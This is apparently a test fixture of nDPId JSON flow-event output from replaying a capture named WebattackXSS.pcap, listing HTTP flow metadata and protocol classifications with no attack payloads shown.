+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 